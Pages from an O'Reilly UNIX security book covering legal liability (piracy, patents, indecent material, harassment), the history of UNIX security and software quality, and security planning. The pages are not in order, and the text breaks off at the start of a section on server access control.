26.4.2.1 Software piracy and the SPA<br />

The Software Publishers Association (SPA) is one of several organizations funded by major software<br />

publishers. One of its primary goals is to cut down on the huge amount of software piracy that is<br />

regularly conducted worldwide. Although each individual act of unauthorized software copying and use<br />

may only deprive the vendor of a few hundred dollars at most, the sheer numbers of software pirates in<br />

operation makes the aggregate losses staggering: worldwide losses are estimated in the billions of dollars<br />

per year. Figures from various sources cited by Mr. Cook in <strong>Internet</strong> & Network Law 1995 indicate:<br />

●<br />

●<br />

●<br />

●<br />

Worldwide losses from software piracy alone may be as high as $15 billion per year.<br />

94% of the software in the Peoples Republic of China is pirated.<br />

92% of the software in use in Japan is pirated.<br />

50% of the software in use in Canada is pirated.<br />

Although there are criminal penalties for unauthorized copying, these penalties are only employed<br />

against organized software piracy organizations. Instead, SPA and others rely on civil-law remedies. In<br />

particular, the SPA can obtain a court order to examine your computer systems for evidence of<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (3 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

unlicensed copies of software. Should such copies be found without supporting documentation to show<br />

valid licenses, you may be subject to a lawsuit resulting in substantial damages. Many companies and<br />

universities have settled with the SPA with regard to these issues, with fines totaling in the many<br />

hundreds of thousands of dollars. This amount is in addition to the many thousands of dollars paid to<br />

vendors for any unlicensed software that is found.<br />

Although the SPA has primarily been focused on software piracy in the PC domain, they will probably<br />

expand their scope into the <strong>UNIX</strong> marketplace as more shrink-wrapped software becomes available for<br />

<strong>UNIX</strong> machines. Of additional concern are the new generations of emulators that let your <strong>UNIX</strong> machine<br />

operate as a "PC" inside a window on your workstation. These emulators run PC software as well as (and<br />

sometimes faster than) a plain desktop PC. The danger is having unlicensed PC software on your<br />

workstations for use in these emulators.<br />

A further danger involves your users. If some of your users are running a clandestine "warez" site from<br />

your FTP server, the SPA or vendors might conceivably seek financial redress from you to help cover the<br />

loss, even if you do not know about the server and otherwise don't condone the behavior.[7]<br />

[7] Whether they would succeed in such an action is something we cannot know. However,<br />

almost anything is possible if a talented attorney were to press the case.<br />

Your best defense in these circumstances is to clearly state to your users that no unlicensed use or<br />

possession of software is allowed under any circumstances. Having internal audits of software is one way<br />

you can check compliance with this policy. If software cannot be documented as paid for and original,<br />

then it should be deleted. Having up-to-date and per-machine log books is one way to track versions of<br />

software.<br />

26.4.3 Trademark Violations<br />

Note that use of trademark phrases, symbols, and insignia without the permission of the holders of the<br />

trademark may lead to difficulties. In particular, don't put corporate logos on your WWW pages without<br />

permission from the corporations involved. Holders of trademarks must carefully regulate and control the<br />

manner in which their trademarks are used, or they lose protection of them. That means that you will<br />

probably hear from a corporate attorney if you put the logos for Sun, HP, Xerox, Microsoft, Coca-Cola,<br />

or other trademark holders on your WWW pages.<br />

26.4.4 Patent Concerns<br />

We've mentioned patent concerns elsewhere in the book. Firms and individuals are applying for (and<br />

receiving) patents on software and algorithms at an astonishing rate. Despite the wording of the<br />

Constitution and laws on patents, the Patent Office is continuing to award patents on obvious ideas,<br />

trivial advances, and pure algorithms. In the middle of 1995, they effectively granted patent protection to<br />

a prime number as well![8]<br />

[8] Patent 5,373,560 covering the use of the prime number 98A3DF52 AEAE9799<br />

325CB258 D767EBD1 F4630E9B 9E21732A 4AFB1624 BA6DF911 466AD8DA<br />

960586F4 A0D5E3C3 6AF09966 0BDDC157 7E54A9F4 02334433 ACB14BCB was<br />

granted on December 13, 1994 to Roger Schlafly of California. Although the patent only<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (4 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

covers the use of the number when used with Schalfly's algorithm, there is no other practical<br />

use for this particular number, because it is easier (and more practical) to generate a<br />

"random" prime number than to use this one.<br />

The danger comes when you write some new code that involves an algorithm you read about, or simply<br />

developed based on obvious prior art. You may discover, when you try to use this in a wider market, that<br />

lawyers from a large corporation will tell you that you cannot use "their" algorithm in your code because<br />

it is covered by their patent. After a patent is granted, the patent holder controls the use of the patented<br />

item for 20 years from the date of filing - you aren't even supposed to use it for experimental purposes<br />

without their approval and/or license!<br />

Many companies are now attempting to build up huge libraries of patents to use as leverage in the<br />

marketplace. In effect, they are submitting applications on everything they develop. This practice is<br />

sad,[9] because it will have an inhibitory effect on software development in the years to come. It is also<br />

sad to see business switch from a mode of competing based on innovation to a mode of competing based<br />

on who has the biggest collection of dubious patents.<br />

[9] Indeed, it already has had negative effects. For instance, the patents on public key<br />

encryption have really hurt information security development in recent years.<br />

Until the courts or Congress step in to straighten out this mess, there is not much you can do to protect<br />

yourself (directly). However, we suggest that you pursue some of the references given in Appendix D,<br />

Paper Sources to further educate yourself on the issues involved. Then consider contacting your elected<br />

representatives to make your views on the matter known.<br />

26.4.5 Pornography and Indecent Material<br />

Every time a new communications medium is presented, pornography and erotica seem to be distributed<br />

using it. Unfortunately, we live in times in which there are people in positions of political and legal<br />

influence who believe that they should be able to define what is and is not proper, and furthermore<br />

restrict access to that material. This belief, coupled with the fact that U.S. standards of acceptability of<br />

nudity and erotic language are more strict than in many places in the world, lead to conflict on the<br />

networks.<br />

As this book goes to press, Congress has passed a law that makes it a criminal offense to put "indecent"<br />

material on a computer where a minor might encounter it. We have also heard of cases in which people<br />

have had their computers confiscated for having a computer image on disk, which they were unaware<br />

was present, that depicted activities that someone decided violated "community standards." There have<br />

also been cases where individuals in one state have been convicted of pornography charges in another<br />

state, even though the material was not considered obscene in the state where the system was normally<br />

accessed. And last of all, you can be in serious legal trouble for simply FTPing an image of a naked<br />

minor, even if you don't know what is in the image at the time you fetch it.<br />

Many of these laws are currently being applied selectively. In several cases, individuals have been<br />

arrested for downloading child pornography from several major online service providers. In the United<br />

States, the mere possession of child pornography is a crime. Yet the online service providers have not<br />

been harassed by law enforcement, even though the same child pornography resided on the online<br />

services' systems.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (5 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

We won't comment on the nature of the laws involved, or the fanatic zeal with which some people pursue<br />

prosecution under these statutes. We will observe that if you or your users have images or text online (for<br />

FTP, WWW, Usenet, or otherwise) that may be considered "indecent" or "obscene," you may wish to<br />

discuss the issue with legal counsel. In general, the U.S. Constitution protects most forms of expression<br />

as "free speech." However, prosecution may be threatened or attempted simply to intimidate and cause<br />

economic hardship: this is not prohibited by the Constitution.<br />

We should also point out that as part of any sensible security administration, you should know what you<br />

have on your computer, and why. Keep track of who is accessing material you provide, and beware of<br />

unauthorized use.<br />

26.4.6 Liability for Damage<br />

Suppose that one of your users puts up a nifty new program on your anonymous FTP site for people to<br />

use. It claims to protect any system against some threat, or fixes a vendor flaw. Someone at the Third<br />

National Bank of Hoople downloads it and runs the program, and the system then crashes, leading to<br />

thousands of dollars in damages.<br />

Or perhaps you are browsing the WWW and discover an applet in a language such as Java that you find<br />

quite interesting. You install a link to it from your home page. Unfortunately, someone on the firewall<br />

machine at Big Whammix, Inc. clicks on the link and the applet somehow interacts with the firewall code<br />

to open an internal network to hackers around the world.<br />

If your response to such incidents is, "Too bad. Software does that sometimes," then you are living<br />

dangerously. Legal precedent is such that you might be liable, at least partially, for damages in cases<br />

such as these. You could certainly be sued and need to answer in court to such charges, and that is not a<br />

pleasant experience. Think about explaining how you designed and tested the code, how you documented<br />

it, and how you warned other users about potential defects and side effects. How about the implied<br />

warranty?<br />

Simply because "everyone on the net" does an action, does not mean that the action will convince a judge<br />

and jury that you aren't responsible for some of the mess that action causes. There have been many times<br />

in the history of the United States that people have been successfully sued for activity which was<br />

widespread. The mere fact that "everybody was doing it" did not stop some particular individuals from<br />

being found liable.<br />

In general, you should get expert legal advice before providing any executable code to others, even if you<br />

intend to give the code away.<br />

26.4.7 Harassment, Threatening Communication, and Defamation<br />

Computers and networks give us great opportunities for communicating with the world. In a matter of<br />

moments, our words can be speeding around the world destined for someone we have never met in<br />

person, or for a large audience. Not only is this ability liberating and empowering, it can be very<br />

entertaining. Mailing lists, "chat rooms," MUDS, newsgroups, and more all provide us with news and<br />

entertainment.<br />

Unfortunately, this same high-speed, high-bandwidth communications medium can also be used for<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (6 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

less-than-noble purposes. Email can be sent to harass someone, news articles can be posted to slander<br />

someone, and online chats can be used to threaten someone with harm.<br />

In the world of paper and telephones, there are legal remedies to harassing and demeaning<br />

communication. Some of those remedies are already being applied to the online world. We have seen<br />

cases of people being arrested for harassment and stalking online, and sued (successfully) for slander in<br />

posted Usenet articles. There have also been cases filed for violation of EEOC laws because of repeated<br />

postings that are sexually, racially, or religiously demeaning.[10]<br />

[10] Note that the use of screen savers with inappropriate images can also contribute to such<br />

complaints.<br />

Words can hurt others, sometimes quite severely. Often, words are a prelude or indicator of other<br />

potential harm, including physical harm. For this reason, you must have policies in place prohibiting<br />

demeaning or threatening postings and mailings from work-related accounts.[11] We further suggest that<br />

you have a policy in place prohibiting any form of anonymous posting or mailing from the workplace.<br />

[11] We are strong advocates of free speech, and are bothered by too much "political<br />

correctness." However, free speech and artistic expression are not usually part of one's job<br />

function in most environments. Expression should be allowed from personal accounts<br />

outside the workplace, and those doing the expressing should be held accountable for the<br />

consequences of their speech.<br />

26.3 Civil Actions 27. Who Do You Trust?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (7 of 7) [2002-04-12 10:44:19]


[Chapter 1] 1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

Chapter 1<br />

Introduction<br />

Dennis Ritchie wrote about the security of <strong>UNIX</strong>: "It was not designed from the start to be secure. It was<br />

designed with the necessary characteristics to make security serviceable."<br />

<strong>UNIX</strong> is a multi-user, multi-tasking operating system. Multi-user means that the operating system allows<br />

many different people to use the same computer at the same time. Multi-tasking means that each user can<br />

run many different programs simultaneously.<br />

One of the natural functions of such operating systems is to prevent different people (or programs) using<br />

the same computer from interfering with each other. Without such protection, a wayward program<br />

(perhaps written by a student in an introductory computer science course) could affect other programs or<br />

other users, could accidentally delete files, or could even crash (halt) the entire computer system. To<br />

keep such disasters from happening, some form of computer security has always had a place in the <strong>UNIX</strong><br />

design philosophy.<br />

But <strong>UNIX</strong> security provides more than mere memory protection. <strong>UNIX</strong> has a sophisticated security<br />

system that controls the ways users access files, modify system databases, and use system resources.<br />

Unfortunately, those mechanisms don't help much when the systems are misconfigured, are used<br />

carelessly, or contain buggy software. Nearly all of the security holes that have been found in <strong>UNIX</strong> over<br />

the years have resulted from these kinds of problems rather than from shortcomings in the intrinsic<br />

design of the system. Thus, nearly all <strong>UNIX</strong> vendors believe that they can (and perhaps do) provide a<br />

reasonably secure <strong>UNIX</strong> operating system. However, there are influences that work against better<br />

security.<br />

1.4.1 Expectations<br />

The biggest problem with improving <strong>UNIX</strong> security is arguably one of expectation. Many users have<br />

grown to expect <strong>UNIX</strong> to be configured in a particular way. Their experience with <strong>UNIX</strong> in academic<br />

and research settings has always been that they have access to most of the directories on the system and<br />

that they have access to most commands. Users are accustomed to making their files world-readable by<br />

default. Users are also often accustomed to being able to build and install their own software, often<br />

requiring system privileges to do so. The trend in "free" versions of <strong>UNIX</strong> for personal computer systems<br />

has amplified these expectations.<br />

Unfortunately, all of these expectations are contrary to good security practice in the business place. To<br />

have stronger security, system administrators must often curtail access to files and commands that are not<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_04.htm (1 of 5) [2002-04-12 10:44:20]


[Chapter 1] 1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

strictly needed for users to do their jobs. Thus, someone who needs email and a text processor for his<br />

work should not also expect to be able to run the network diagnostic programs and the C compiler.<br />

Likewise, to heighten security, users should not be able to install software that has not been examined<br />

and approved by a trained and authorized individual.<br />

The tradition of open access is strong, and is one of the reasons that <strong>UNIX</strong> has been attractive to so many<br />

people. Some users argue that to restrict these kinds of access would make the systems something other<br />

than <strong>UNIX</strong>. Although these arguments may be valid, in instances where strong security is required,<br />

restrictive measures may be needed.<br />

At the same time, administrators can strengthen security by applying some general security principles, in<br />

moderation. For instance, rather than removing all compilers and libraries from each machine, the tools<br />

can be protected so that only users in a certain user group can access them. Users with a need for such<br />

access, and who can be trusted to take due care, can be added to this group. Similar methods can be used<br />

with other classes of tools, too, such as network monitoring software or Usenet news programs.<br />

Furthermore, changing the fundamental view of data on the system can be beneficial: from readable by<br />

default to unreadable by default. For instance, user files and directories should be protected against read<br />

access instead of being world-readable by default. Setting file access control values appropriately and<br />

using shadow password files are just two examples of how this simple change in system configuration<br />

can improve the overall security of <strong>UNIX</strong>.<br />

The most critical aspect of enhancing <strong>UNIX</strong> security is that the users themselves participate in the<br />

alteration of their expectations. The best way to meet this goal is not by decree, but through education<br />

and motivation. Many users started using <strong>UNIX</strong> in an environment less threatening than they face today.<br />

By educating users of the dangers and how their cooperation can help to thwart those dangers, the<br />

security of the system is increased. By properly motivating the users to participate in good security<br />

practice, you make them part of the security mechanism. Better education and motivation work well only<br />

when applied together, however; education without motivation may not be applied, and motivation<br />

without education leaves gaping holes in what is done.<br />

1.4.2 Software Quality<br />

Much of the <strong>UNIX</strong> operating system and utilities that people take for granted was written as student<br />

projects, or as quick "hacks" by software developers inside research labs. These programs were not<br />

formally designed and tested: they were put together and debugged on the fly. The result is a large<br />

collection of tools that usually work, but sometimes fail in unexpected and spectacular ways. Utilities<br />

were not the only things written by students. Much of BSD <strong>UNIX</strong>, including the networking code, was<br />

written by students as research projects of one sort or another - and these efforts sometimes ignored<br />

existing standards and conventions.<br />

This analysis is not intended to cast aspersions on the abilities of students, and instead points out that<br />

today's <strong>UNIX</strong> was not created as a carefully designed and tested system. Indeed, a considerable amount<br />

of the development of <strong>UNIX</strong> and its utilities occurred at a time when good software engineering tools<br />

and techniques were not yet developed or readily available.[7] The fact that occasional bugs are<br />

discovered that result in compromises of the security of the system is no wonder; the fact that so few<br />

bugs are evident is perhaps the real wonder!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_04.htm (2 of 5) [2002-04-12 10:44:20]


[Chapter 1] 1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

[7] Some would argue that they are still not available. Few academic environments currently<br />

have access to modern software engineering tools because of their cost, and few vendors are<br />

willing to provide copies at prices that academic institutions can afford.<br />

Unfortunately, two things are not occurring as a result of the discovery of faults in the existing code. The<br />

first is that software designers are not learning from past mistakes. For instance, buffer overruns (mostly<br />

resulting from fixed-length buffers and functions that do not check their arguments) have been<br />

recognized as a major <strong>UNIX</strong> problem area for some time, yet software continues to be discovered<br />

containing such bugs, and new software is written without consideration of these past problems. For<br />

instance, a fixed-length buffer overrun in the gets () library call was one of the major propagation modes<br />

of the Morris <strong>Internet</strong> worm of 1988, yet, as we were working on the second edition of this book in late<br />

1995, news of yet another buffer-overrun security flaw surfaced - this time in the BSD-derived syslog()<br />

library call. It is inexcusable that vendors continue to ship software with these kinds of problems in<br />

place.<br />

A more serious problem than any particular flaw is the fact that few, if any, vendors are performing an<br />

organized program of testing on the software they provide. Although many vendors test their software for<br />

compliance with industry "standards," few apparently test their software to see what it does when<br />

presented with unexpected data or conditions. With as much as 40% of the utilities on some machines<br />

being buggy,[8] one might think that vendors would be eager to test their versions of the software and to<br />

correct lurking bugs. However, as more than one vendor"s software engineer has told us, "The customers<br />

want their <strong>UNIX</strong> - including the flaws - exactly like every other implementation. Furthermore, it's not<br />

good business: customers will pay extra for performance, but not for better testing."<br />

[8] See the reference to the paper by Barton Miller, et al., given in Appendix D.<br />

As long as the customers demand strict conformance of behavior to existing versions of the programs,<br />

and as long as software quality is not made a fundamental purchase criterion by those same customers,<br />

vendors will most likely do very little to systematically test and fix their software. Formal standards, such<br />

as the ANSI C standard and POSIX standard help perpetuate and formalize these weaknesses, too. For<br />

instance, the ANSI C standard[9] perpetuates the gets() library call, forcing <strong>UNIX</strong> vendors to support the<br />

call, or to issue systems at a competitive disadvantage because they are not in compliance with the<br />

standard.[10]<br />

[9] ANSI X3J11<br />

[10] See Appendix D for references describing this scenario.<br />

1.4.3 Add-On Functionality Breeds Problems<br />

One final influence on <strong>UNIX</strong> security involves the way new functionality has been added over the years.<br />

<strong>UNIX</strong> is often cited for its flexibility and reuse characteristics; therefore, new functions are constantly<br />

built on top of <strong>UNIX</strong> platforms and eventually integrated into released versions. Unfortunately, the<br />

addition of new features is often done without understanding the assumptions that were made with the<br />

underlying mechanisms and without concern for the added complexity presented to the system operators<br />

and maintainers. Applying the same features and code in a heterogeneous computing environment can<br />

also lead to problems.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_04.htm (3 of 5) [2002-04-12 10:44:20]


[Chapter 1] 1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

As a special case, consider how large-scale computer networks such as the <strong>Internet</strong> have dramatically<br />

changed the security ground rules from those under which <strong>UNIX</strong> was developed. <strong>UNIX</strong> was originally<br />

developed in an environment where computers did not connect to each other outside of the confines of a<br />

small room or research lab. Networks today interconnect tens of thousands of machines, and millions of<br />

users, on every continent in the world. For this reason, each of us confronts issues of computer security<br />

directly: a doctor in a major hospital might never imagine that a postal clerk on the other side of the<br />

world could pick the lock on her desk drawer to rummage around her files, yet this sort of thing happens<br />

on a regular basis to "virtual desk drawers" on the <strong>Internet</strong>.<br />

Most colleges and many high schools now grant network access to all of their students as a matter of<br />

course. The number of primary schools with network access is also increasing, with initiatives in many<br />

U.S. states to put a networked computer in every classroom. Granting telephone network access to a<br />

larger number of people increases the chances of telephone abuse and fraud, the same as granting<br />

widespread computer network access increases the chances that the access will be used for illegitimate<br />

purposes. Unfortunately, the alternative of withholding access is equally unappealing. Imagine operating<br />

without a telephone because of the risk of receiving prank calls!<br />

The foundations and traditions of <strong>UNIX</strong> network security, however, were profoundly shaped by the<br />

earlier, more restricted view of networks, and not by our more recent experiences. For instance, the<br />

concept of user IDs and group IDs controlling access to files was developed at a time when the typical<br />

<strong>UNIX</strong> machine was in a physically secure environment. On top of this was added remote manipulation<br />

commands such as rlogin and rcp that were designed to reuse the user-ID/group-ID paradigm with the<br />

concept of "trusted ports" for network connections. Within a local network in a closed lab, using only<br />

relatively slow computers, this design (usually) worked well. But now, with the proliferation of<br />

workstations and non-<strong>UNIX</strong> machines on international networks, this design, with its implicit<br />

assumptions about restricted access to the network, leads to major weaknesses in security.[11]<br />

[11] Peter Salus notes in his fine history Casting the Net: From Arpanet to <strong>Internet</strong> and<br />

Beyond... (Addison-Wesley, 1995), that Bob Metcalf warned of these dangers in 1973, in<br />

RFC 602. That warning, and others like it, went largely unheeded.<br />

Not all of these unsecure foundations were laid by <strong>UNIX</strong> developers. The IP protocol suite on which the<br />

<strong>Internet</strong> is based, was developed outside of <strong>UNIX</strong> initially, and it was developed without a sufficient<br />

concern for authentication and confidentiality. This lack of concern has enabled recent cases of password<br />

sniffing and IP sequence spoofing to occur, and make news, as "sophisticated" attacks.[12] (These<br />

attacks are discussed in Chapter 16, TCP/IP Networks.)<br />

[12] To be fair, the designers of TCP/IP were aware of many of the problems. However,<br />

they were more concerned about making everything work so they did not address many of<br />

the problems in their design. The problems are really more the fault of people trying to build<br />

critical applications on an experimental set of protocols before the protocols were properly<br />

refined - a familiar problem.<br />

Another facet of the problem has to do with the "improvements" made by each vendor. Rather than<br />

attempting to provide a unified, simple interface to system administration across platforms, each vendor<br />

has created a new set of commands and functions. In many cases, improvements to the command set<br />

have been available to the administrator. However, there are also now hundreds (perhaps thousands) of<br />

new commands, options, shells, permissions, and settings that the administrator of a heterogeneous<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_04.htm (4 of 5) [2002-04-12 10:44:20]


[Chapter 1] 1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

computing environment must understand and remember. Additionally, many of the commands and<br />

options are similar to each other, but have different meanings depending on the environment in which<br />

they are used. The result can often be disaster when the poor administrator suffers momentary confusion<br />

about the system or has a small lapse in memory. This complexity further complicates the development<br />

of tools that are intended to provide cross-platform support and control. For a "standard" operating<br />

system, <strong>UNIX</strong> is one of the most nonstandard systems to administer.<br />

That such difficulties arise is both a tribute to <strong>UNIX</strong>, and a condemnation. The robust nature of <strong>UNIX</strong><br />

enables it to accept and support new applications by building on the old. However, existing mechanisms<br />

are sometimes completely inappropriate for the tasks assigned to them. Rather than being a<br />

condemnation of <strong>UNIX</strong>, such shortcomings are actually an indictment of the developers for failing to<br />

give more consideration to the human and functional ramifications of building on the existing<br />

foundation.<br />

Here, then, is a conundrum: to rewrite large portions of <strong>UNIX</strong> and the protocols underlying its<br />

environment, or to fundamentally change its structure, would be to attack the very reasons <strong>UNIX</strong> has<br />

become so widely used. Furthermore, such restructuring would be contrary to the spirit of standardization<br />

that has been a major factor in the recent wide acceptance of <strong>UNIX</strong>. At the same time, without<br />

reevaluation and some restructuring, there is serious doubt about the level of trust that can be placed in<br />

the system. Ironically, the same spirit of development and change is what has led <strong>UNIX</strong> to its current<br />

niche.<br />

1.3 History of <strong>UNIX</strong> 1.5 Role of This Book<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_04.htm (5 of 5) [2002-04-12 10:44:20]


[Chapter 2] Policies and Guidelines<br />

Chapter 2<br />

2. Policies and Guidelines<br />

Contents:<br />

Planning Your <strong>Sec</strong>urity Needs<br />

Risk Assessment<br />

Cost-Benefit Analysis<br />

Policy<br />

The Problem with <strong>Sec</strong>urity Through Obscurity<br />

Fundamentally, computer security is a series of technical solutions to non-technical problems. You can<br />

spend an unlimited amount of time, money, and effort on computer security, but you will never quite<br />

solve the problem of accidental data loss or intentional disruption of your activities. Given the right set of<br />

circumstances - software bugs, accidents, mistakes, bad luck, bad weather, or a motivated and<br />

well-equipped attacker - any computer can be compromised, rendered useless, or worse.<br />

The job of the security professional is to help organizations decide how much time and money need to be<br />

spent on security. Another part of that job is to make sure that organizations have policies, guidelines,<br />

and procedures in place so that the money spent is spent well. And finally, the professional needs to audit<br />

the system to ensure that the appropriate controls are implemented correctly to achieve the policy's goals.<br />

Thus, practical security is really a question of management and administration more than it is one of<br />

technical skill. Consequently, security must be a priority of your firm's management.<br />

This book divides the process of security planning into six discrete steps:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

<strong>Sec</strong>urity needs planning<br />

Risk assessment<br />

Cost-benefit analysis<br />

Creating policies to reflect your needs<br />

Implementation<br />

Audit and incident response<br />

This chapter covers security planning, risk assessment, cost-benefit analysis, and policy-making.<br />

Implementation is covered by many of the chapters of this book. Audit is described in Chapter 10,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_01.htm (1 of 4) [2002-04-12 10:44:20]


[Chapter 2] Policies and Guidelines<br />

Auditing and Logging, and incident response in Chapter 17, TCP/IP Services through Chapter 26,<br />

Computer <strong>Sec</strong>urity and U.S. Law.<br />

There are two critical principles implicit in effective policy and security planning:<br />

●<br />

●<br />

Policy and security awareness must be driven from the top down in the organization. <strong>Sec</strong>urity<br />

concerns and awareness by the users are important, but they cannot build or sustain an effective<br />

culture of security. Instead, the head(s) of the organization must treat security as important, and<br />

abide by all the same rules and regulations as everyone else.<br />

Effective computer security means protecting information. All plans, policies and procedures<br />

should reflect the need to protect information in whatever form it takes. Proprietary data does not<br />

become worthless when it is on a printout or is faxed to another site instead of contained in a disk<br />

file. Customer confidential information does not suddenly lose its value because it is recited on the<br />

phone between two users instead of contained within an email message. The information should be<br />

protected no matter what its form.<br />

2.1 Planning Your <strong>Sec</strong>urity Needs<br />

A computer is secure if it behaves the way that you expect it will.<br />

There are many different kinds of computer security, and many different definitions. Rather than present<br />

a formal definition, this book takes the practical approach and discusses the categories of protection you<br />

should consider. We believe that secure computers are usable computers, and, likewise, that computers<br />

that cannot be used, for whatever the reason, are not very secure.<br />

Within this broad definition, there are many different kinds of security that both users and administrators<br />

of computer systems need to be concerned about:<br />

Confidentiality<br />

Protecting information from being read or copied by anyone who has not been explicitly<br />

authorized by the owner of that information. This type of security includes not only protecting the<br />

information in toto, but also protecting individual pieces of information that may seem harmless by<br />

themselves but that can be used to infer other confidential information.<br />

Data integrity<br />

Protecting information (including programs) from being deleted or altered in any way without the<br />

permission of the owner of that information. Information to be protected also includes items such<br />

as accounting records, backup tapes, file creation times, and documentation.<br />

Availability<br />

Protecting your services so they're not degraded or made unavailable (crashed) without<br />

authorization. If the system is unavailable when an authorized user needs it, the result can be as<br />

bad as having the information that resides on the system deleted.<br />

Consistency<br />

Making sure that the system behaves as expected by the authorized users. If software or hardware<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_01.htm (2 of 4) [2002-04-12 10:44:20]


[Chapter 2] Policies and Guidelines<br />

suddenly starts behaving radically differently from the way it used to behave, especially after an<br />

upgrade or a bug fix, a disaster could occur. Imagine if your ls command occasionally deleted files<br />

instead of listing them! This type of security can also be considered as ensuring the correctness of<br />

the data and software you use.<br />

Control<br />

Regulating access to your system. If unknown and unauthorized individuals (or software) are<br />

found on your system, they can create a big problem. You must worry about how they got in, what<br />

they might have done, and who or what else has also accessed your system. Recovering from such<br />

episodes can require considerable time and expense for rebuilding and reinstalling your system,<br />

and verifying that nothing important has been changed or disclosed - even if nothing actually<br />

happened.<br />

Audit<br />

As well as worrying about unauthorized users, authorized users sometimes make mistakes, or even<br />

commit malicious acts. In such cases, you need to determine what was done, by whom, and what<br />

was affected. The only way to achieve these results is by having some incorruptible record of<br />

activity on your system that positively identifies the actors and actions involved. In some critical<br />

applications, the audit trail may be extensive enough to allow "undo" operations to help restore the<br />

system to a correct state.<br />

Although all of these aspects of security above are important, different organizations will view each with<br />

a different amount of importance. This variance is because different organizations have different security<br />

concerns, and must set their priorities and policies accordingly. For example:<br />

●<br />

●<br />

●<br />

In a banking environment, integrity and auditability are usually the most critical concerns, while<br />

confidentiality and availability are the next in importance.<br />

In a national defense-related system that processes classified information, confidentiality may<br />

come first, and availability last.[1]<br />

[1] In some highly classified environments, officials would prefer to blow up a<br />

building rather than allow an attacker to gain access to the information contained<br />

within that building's walls.<br />

In a university, integrity and availability may be the most important requirements. The priority is<br />

that students be able to work on their papers, rather than tracking the precise times that students<br />

accessed their accounts.<br />

If you are a security administrator, you need to thoroughly understand the needs of your operational<br />

environment and users. You then need to define your procedures accordingly. Not everything we<br />

describe in this book will be appropriate in every environment.<br />

2.1.1 Trust<br />

<strong>Sec</strong>urity professionals generally don't refer to a computer system as being "secure" or "unsecure."[2]<br />

Instead, we use the word "trust" to describe our level of confidence that a computer system will behave<br />

as expected. This acknowledges that absolute security can never be present. We can only try to approach<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_01.htm (3 of 4) [2002-04-12 10:44:20]


[Chapter 2] Policies and Guidelines<br />

it by developing enough trust in the overall configuration to warrant using it for critical applications.<br />

[2] We use the term unsecure to mean having weak security, and insecure to describe the<br />

state of mind of people running unsecure systems.<br />

Developing adequate trust in your computer systems requires careful thought and planning. Decisions<br />

should be based on sound policy decisions and risk analysis. In the remainder of this chapter, we"ll<br />

discuss the general procedure for creating workable security plans and policies. The topic is too big,<br />

however, for us to provide an in-depth treatment:<br />

●<br />

●<br />

If you are at a company, university, or government agency, we suggest that you contact your<br />

internal audit and/or risk management department for additional help (they may already have some<br />

plans and policies in place that you should know about). You can also learn more about this topic<br />

by consulting some of the works referenced in Appendix D, Paper Sources. You may also wish to<br />

enlist a consulting firm. For example, many large accounting and audit firms now have teams of<br />

professionals that can evaluate the security of computer installations.<br />

If you are with a smaller institution or are dealing with a personal machine, you may decide that<br />

we cover these issues in greater detail than you actually need. Nevertheless, the information<br />

contained in this chapter will help guide you in setting your priorities.<br />

1.5 Role of This Book 2.2 Risk Assessment<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_01.htm (4 of 4) [2002-04-12 10:44:20]


[Chapter 17] 17.2 Controlling Access to Servers<br />

Chapter 17<br />

TCP/IP Services<br />

17.2 Controlling Access to Servers<br />

As it is delivered by most vendors, <strong>UNIX</strong> is intended to be a friendly and trusting operating system; by<br />

default, network services are offered to every other computer on the network. Unfortunately, this practice<br />

is not an advisable policy in today's networked world. While you may want to configure your network<br />

server to offer a wide variety of network services to computers on your organization's internal network,<br />

you probably want to restrict the services that your computer offers to the outside world.<br />

A few <strong>UNIX</strong> servers have built-in facilities for limiting access based on the IP address or hostname of<br />

the computer making the service request.[5] For example, NFS allows you to specify which hosts can<br />

mount a particular filesystem, and nntp allows you to specify which hosts can read netnews.<br />

Unfortunately, these services are in the minority: most <strong>UNIX</strong> servers have no facility for host-by-host<br />

access control.<br />

[5] Restricting a service by IP address or hostname is a fundamentally unsecure way to<br />

control access to a server. Unfortunately, because more sophisticated authentication services<br />

